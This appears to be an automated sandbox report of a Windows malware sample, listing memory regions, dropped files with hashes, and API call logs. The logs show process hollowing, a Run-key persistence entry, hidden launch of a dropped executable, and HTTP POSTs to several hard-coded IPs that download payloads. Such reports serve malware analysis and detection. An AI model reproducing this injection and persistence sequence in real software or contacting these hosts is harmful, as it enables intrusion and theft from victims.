private_0x0000000002520000 0x02520000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x0000000002660000 0x02660000 0x0269ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000026a0000 0x026a0000 0x026a7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000026b0000 0x026b0000 0x026bffff Private Memory Readable, Writable True False False -
private_0x00000000026c0000 0x026c0000 0x026e3fff Private Memory Readable, Writable, Executable True False False -
d3a3.tmp 0x026f0000 0x026f0fff Memory Mapped File Readable True True False
private_0x0000000002710000 0x02710000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002720000 0x02720000 0x0281ffff Private Memory Readable, Writable True False False -
private_0x0000000002840000 0x02840000 0x0287ffff Private Memory Readable, Writable True False False -
private_0x0000000002880000 0x02880000 0x0297ffff Private Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x029bffff Private Memory Readable, Writable True False False -
private_0x00000000029c0000 0x029c0000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afafff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc6.dll 0x74e10000 0x74e1cfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74e20000 0x74e79fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74e80000 0x74eb7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc.dll 0x75110000 0x75121fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x75130000 0x75137fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x75140000 0x75145fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x75150000 0x75154fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x75160000 0x75167fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x75170000 0x751abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x751b0000 0x751c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x751d0000 0x751dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x751e0000 0x751e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x751f0000 0x751fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x75200000 0x75205fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x75210000 0x7521cfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75220000 0x75226fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75230000 0x75273fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x752b0000 0x752cbfff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x77660000 0x77662fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\programdata\oyvgkgw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1: 2d4575457d337753a57b7941d13ac9665342641a
SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp 0.05 KB MD5: f82e7a2f3860bbe2226620e0a569d5bb
SHA1: 4e7c4099d0597bc28f4ffea6a00d6c44341ee04c
SHA256: b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2
False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe 77.50 KB MD5: 3290d6946b5e30e70414990574883ddb
SHA1: be0144e3235ffde0787e9f1cd34c828ec87d8e19
SHA256: 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663
False
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp 0.09 KB MD5: 373017c133fb80b96aaec222ce291d38
SHA1: 08db0aebdfd799ce29aa3086abfac8dfccc6816e
SHA256: 5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04
False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp 0.11 KB MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
False
Threads
Thread 0xb74
1099 37
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System Get Time type = Ticks, time = 202504 True 61
Fn
System Get Time type = Ticks, time = 202520 True 76
Fn
System Get Time type = Ticks, time = 202536 True 112
Fn
System Get Time type = Ticks, time = 206888 True 1
Fn
System Get Time type = Ticks, time = 206904 True 13
Fn
System Get Time type = Ticks, time = 206919 True 16
Fn
Mutex Create mutex_name = PEMB64 True 1
Fn
System Get Time type = Ticks, time = 206935 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex Create mutex_name = Global\I78B0A7D7 True 1
Fn
Mutex Create mutex_name = Global\M78B0A7D7 True 1
Fn
Mutex Release mutex_name = Global\I78B0A7D7 True 1
Fn
System Get Time type = Ticks, time = 206935 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
System Get Time type = Ticks, time = 206935 True 74
Fn
System Get Time type = Ticks, time = 206950 True 78
Fn
System Get Time type = Ticks, time = 206966 True 26
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
System Get Time type = Ticks, time = 206966 True 50
Fn
System Get Time type = Ticks, time = 206982 True 20
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Module Unmap process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
System Get Time type = Ticks, time = 207060 True 17
Fn
System Get Time type = Ticks, time = 207075 True 12
Fn
System Get Time type = Ticks, time = 207091 True 20
Fn
System Get Time type = Ticks, time = 207106 True 2
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Time type = Ticks, time = 207106 True 34
Fn
System Get Time type = Ticks, time = 207122 True 108
Fn
System Get Time type = Ticks, time = 207138 True 107
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 197.245.46.11, server_port = 80 True 1
Fn
System Get Time type = Ticks, time = 207403 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 197.245.46.11 False 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 219197 True 9
Fn
System Get Time type = Ticks, time = 219212 True 13
Fn
System Get Time type = Ticks, time = 219228 True 9
Fn
System Get Time type = Ticks, time = 219243 True 9
Fn
System Get Time type = Ticks, time = 219259 True 7
Fn
System Get Info type = Operating System False 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Time type = Ticks, time = 219275 True 6
Fn
System Get Time type = Ticks, time = 219290 True 32
Fn
System Get Time type = Ticks, time = 219306 True 32
Fn
System Get Time type = Ticks, time = 219321 True 49
Fn
System Get Time type = Ticks, time = 219337 True 70
Fn
System Get Time type = Ticks, time = 219353 True 60
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Inet Read Response size = 898612, size_out = 898612 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 248603 True 1
Fn
System Get Time type = Ticks, time = 248618 True 58
Fn
System Get Time type = Ticks, time = 248634 True 120
Fn
System Get Time type = Ticks, time = 248649 True 70
Fn
Registry Write Value value_name = syncpack, data = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe", size = 130, type = REG_SZ True 1
Fn
System Get Time type = Ticks, time = 250771 True 1
Fn
File Create filename = C:\ProgramData\oyvGkGw.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\ProgramData\oyvGkGw.exe, size = 335922 True 1
Fn
Data
Process Create process_name = C:\ProgramData\oyvGkGw.exe, os_pid = 0x64, show_window = SW_HIDE True 1
Fn
System Get Time type = Ticks, time = 250802 True 1
Fn
System Get Time type = Ticks, time = 250818 True 10
Fn
System Get Time type = Ticks, time = 250865 True 3
Fn
System Get Time type = Ticks, time = 250880 True 10
Fn
System Get Time type = Ticks, time = 250896 True 10
Fn
System Get Time type = Ticks, time = 250912 True 11
Fn
System Get Time type = Ticks, time = 250927 True 4
Fn
System Get Info type = Operating System False 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Time type = Ticks, time = 250927 True 20
Fn
System Get Time type = Ticks, time = 250943 True 88
Fn
System Get Time type = Ticks, time = 250958 True 113
Fn
System Get Time type = Ticks, time = 250974 True 28
Fn
System Get Time type = Ticks, time = 250974 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
System Get Time type = Ticks, time = 251208 True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
System Get Time type = Ticks, time = 251473 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Inet Read Response size = 280388, size_out = 280388 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 258322 True 61
Fn
System Get Time type = Ticks, time = 258337 True 17
Fn
System Get Time type = Ticks, time = 260662 True 1
Fn
File Write size = 335922 True 1
Fn
Data
System Get Time type = Ticks, time = 260849 True 5
Fn
System Get Time type = Ticks, time = 260864 True 13
Fn
System Get Time type = Ticks, time = 260880 True 15
Fn
System Get Time type = Ticks, time = 260896 True 14
Fn
System Get Time type = Ticks, time = 260911 True 6
Fn
System Get Time type = Ticks, time = 260927 True 50
Fn
System Get Time type = Ticks, time = 260942 True 35
Fn
System Get Time type = Ticks, time = 260958 True 2
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
System Get Time type = Ticks, time = 260958 True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
System Get Time type = Ticks, time = 260958 True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Inet Read Response size = 148, size_out = 148 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 261379 True 80
Fn
Thread 0x878
29 4
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 250787 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = userenv.dll, base_address = 0x75290000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
File Create Temp File filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", os_pid = 0x4f4, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Memory Protect process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 False 1
Fn
Module Unmap process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" True 1
Fn
Memory Allocate process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x878 True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, size = 114688 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x7efde008, size = 4 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x7efdf010, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x878 True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x878 True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 94.70.244.227, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 94.70.244.227 False 1
Fn
Thread 0x86c
35 0
»
Category Operation Information Success Count Logfile
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = userenv.dll, base_address = 0x75290000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
File Create Temp File filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
